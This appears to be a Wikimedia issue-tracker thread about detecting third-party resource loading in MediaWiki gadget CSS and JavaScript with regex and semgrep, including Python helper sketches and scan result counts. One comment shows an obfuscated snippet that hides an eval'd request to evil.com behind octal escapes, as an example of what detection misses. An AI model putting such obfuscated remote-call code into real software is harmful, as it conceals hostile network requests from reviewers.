I feel like something like semgrep would maybe be applicable here, since this is essentially static analysis.

> @sbassett, as a next step I'd probably use your idea of detecting TPR use by searching for things like import, importScript, mw.loader.load, xmlhttprequest, jquery.load, url for css, et al. Glad to hear if you think there's a cleaner way to avoid false positives.

Makes sense. We'd want to ensure that we've got all of the various standard ways to load TPR covered with whatever functions etc. that are allowed. Unfortunately, this won't catch certain things like brainfu**-ified code or random obfuscations e.g.

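// The method name and URL are built from octal escapes, so a plain-text
// search for "open" or "https://" finds nothing in this source.
var x = new XMLHttpRequest();
var a = "\157\160\145\156";              // "open"
var b = "\150\164\164\160\163\72\57\57"; // "https://"
var c = "\56\143\157\155";               // ".com"
// Evaluates: x.open('GET', 'https://evil.com')
eval("x." + a + "('GET', '" + b + "evil" + c + "')");
x.send();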

But that's a slightly different problem IMO as it involves intentionally malicious actors, which shouldn't really be most Gadget developers/users.
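
To illustrate why string search misses this kind of obfuscation, the sketch below decodes JavaScript-style octal escapes from a raw string literal and compares the result with the raw text. It only covers octal escapes; hex, unicode escapes, string concatenation and other tricks would each need their own handling.

```python
import re

# JS legacy octal escapes: up to three digits if the first is 0-3, otherwise up to two.
OCTAL_RE = re.compile(r"\\([0-3][0-7]{0,2}|[4-7][0-7]?)")

def decode_octal_escapes(literal):
    """Replace each octal escape in a raw literal with the character it encodes."""
    return OCTAL_RE.sub(lambda m: chr(int(m.group(1), 8)), literal)

def hides(literal, needle):
    """True if the needle is absent from the raw text but present once decoded."""
    return needle not in literal and needle in decode_octal_escapes(literal)
```

For the three literals in the snippet above, the decoded values are `open`, `https://` and `.com`, none of which appear in the raw source.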

> I feel like something like semgrep would maybe be applicable here, since this is essentially static analysis.

That could work as semgrep does a few nice things out of the box, like ignoring anything in comments. We have a basic "http leaks" semgrep rule that works like this, but is likely too simple for this task. Still, it could be expanded upon and semgrep could be run from a basic python CLI for additional control/processing, which we've done before.
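
Running semgrep from a small Python wrapper could look like the sketch below. It is not the "http leaks" rule or the CLI mentioned above; the rule file and target directory are placeholders, and the code only relies on the `--config`, `--json` and `--quiet` options and on the `results` list in semgrep's JSON output.

```python
import json
import subprocess

def semgrep_command(rules_path, target_dir):
    """Build the semgrep invocation; both paths are placeholders supplied by the caller."""
    return ["semgrep", "--config", rules_path, "--json", "--quiet", target_dir]

def run_semgrep(rules_path, target_dir):
    """Run semgrep and return its parsed JSON report (requires semgrep on PATH)."""
    proc = subprocess.run(
        semgrep_command(rules_path, target_dir),
        capture_output=True, text=True, check=False,
    )
    return json.loads(proc.stdout)

def summarize(report):
    """Reduce a semgrep JSON report to (path, line, rule id) tuples."""
    return [
        (result["path"], result["start"]["line"], result["check_id"])
        for result in report.get("results", [])
    ]
```

Keeping `summarize` separate from the subprocess call makes the post-processing step testable without semgrep installed.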

Thanks for your input @Bawolff and @sbassett. So far the script outputs ~2800 potential candidates (see the table in F55305255#7434). I'll see how to leverage semgrep to improve the filtering logic and reduce false positives.

Hey all -

I did a little experimenting with a semgrep-based version of @sguebo_WMF's script. It's available here, for now, as a personal gist:

https://gist.github.com/sbassett29/079a750c1e822e61b10db62f6ac0ce95

We'd need to clean up the python a bit and write some tests for the semgrep yaml files if we wanted to incorporate this into any official code or use it in any sort of production capacity. But I think it works fairly well. Anyhow, some notes:

  1. There are three separate semgrep rules for now - one for pure external urls (but only in code), one for css external resource sinks and one for javascript external resource sinks. These should be fairly obvious in the gist and I think the patterns, etc. should be fairly self-explanatory for anyone familiar with vaguely regular-expression-style syntax. Happy to walk through these though for anyone with questions.
  2. The three different semgrep rules get us somewhere close to the truth re: external resource usage within CSS and JS files under the MediaWiki namespace. But there are plenty of caveats:
    1. It's easy to find obvious URL strings, but that won't cover all external resource-loading sinks as URLs can be abstracted via variables, etc. So there are always going to be false positives. When we find these, we can likely add them to the semgrep rules' pattern-not-regex keys.
    2. Semgrep isn't smart enough by itself to understand nested file-importing within the context of MediaWiki JS pages. Or tell us the value of variables as it pattern-matches them within various external resource-loading sinks (e.g. mw.loader.load(url)), so these would have to be audited manually for now.
    3. Semgrep doesn't like parsing certain JS files :/ If you run the cli in the standard mode (non-table) it should display any errors at the beginning for files it was unable to parse. This really only surfaced for JS files, and it was really only a dozen or so files, which could be manually audited.
    4. There are likely some redundant findings. For example, the CSS rule finds url() and @import calls, but all of the @import calls seem to be of the format: @import url(...)
    5. The python cli should be able to be run anywhere with an internet connection and python 3, e.g. no toolforge dependencies. Caching all local files does take 2+ hours though, in my experience (hence why there's a FILE_RECACHE global that should be set to False most of the time).
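
The redundant findings mentioned in caveat 4 (a single `@import url(...)` line matching both the `url()` and the `@import` pattern) could be collapsed in post-processing, as in the sketch below. The finding dictionaries and rule names are hypothetical and do not reflect the gist's actual data structures.

```python
def dedupe_findings(findings):
    """Keep only the first finding reported for each (path, line) pair."""
    seen = set()
    unique = []
    for finding in findings:
        key = (finding["path"], finding["line"])
        if key not in seen:
            seen.add(key)
            unique.append(finding)
    return unique
```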

That being said, this seems to get us to a better place than regular expressions alone. I've run the script against recent versions of various CSS and JS pages from the projects and found some interesting results:

  1. CSS sinks - 96 findings - P65553
  2. JS sinks - 3,351 findings - P65554 (many of these are likely false positives)
  3. Raw external URLs - 14,992 findings (many of these are false positives, used to create clickable links, etc.)
  4. Over 26,606 files total from all of the projects